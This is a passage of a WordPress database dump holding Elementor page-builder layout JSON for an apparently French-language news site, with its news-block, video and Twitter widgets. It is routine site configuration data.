},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":60.524},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.475},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"300\",\"twitter_widget_tweet_limit\":\"2\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"2\"],\"excerpt_value\":10,\"category_border_color\":\"#23a455\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(3092,925,'_elementor_version','0.4'),(3093,925,'_elementor_css','a:3:{s:4:\"time\";i:1511347745;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(3095,926,'_elementor_edit_mode','builder'),(3096,926,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":41},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":2},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":19},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":16},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":0,\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":24},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\",\"use_icon\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"1\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":19},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"